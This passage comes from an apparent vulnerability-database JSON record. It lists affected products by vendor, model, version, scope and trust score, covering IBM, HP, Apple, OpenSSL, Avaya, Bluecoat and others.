0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "systems director common agent for linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "flex system chassis management module 1.20.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.0" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "packetshaper", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "9.2.10" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.7.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1.2" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3.2" }, { "model": "ps110", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "aspera point to point", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.33" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.3.0" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.0.7" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.1.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70000" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "imc uam e0302p07", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v7)0" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.7.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "qradar vulnerability manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "systems director common agent for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "ra", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tuxedo", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1.0" }, { "model": "proxysg sgos", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.6.1" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "rf manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.1" }, { "model": "h.07", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-495" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2.2" }, { "model": "office connect pm", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18100" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "ya", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "switch series r2311p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5900" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "msm", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.26.2.1.2" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.30" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "12500(comware r7328p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v7)" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.0.1" }, { "model": "systems director common agent for linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0" }, { "model": "systems director common agent for linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "w", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.1.1" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.7.0" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "pb", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "nextscale n1200 enclosure fan power controller fhet13a-2.00", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "msm", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.56.5.1.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "flex system chassis management module 1.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.10" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.4" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.3" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.7.7" }, { "model": "xcode", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "7.0" }, { "model": "switch series r2111p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "11900" }, { "model": "imc uam", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.5" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "packetshaper", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "aspera orchestrator", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "2.10" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "systems director common agent for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3" }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "insight control server provisioning 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "sterling connect:enterprise http option", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51300" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "y", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59200" }, { "model": "u", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "insight control", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.34" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "flex system chassis management module 2.5.3t", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "l", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3500-" }, { "model": "server migration pack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "m220", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system chassis management module 1.0.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "imc wsm", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aspera ondemand for amazon", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "msm", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.36.3.1.0" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "server migration pack", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3700-" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59000" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": 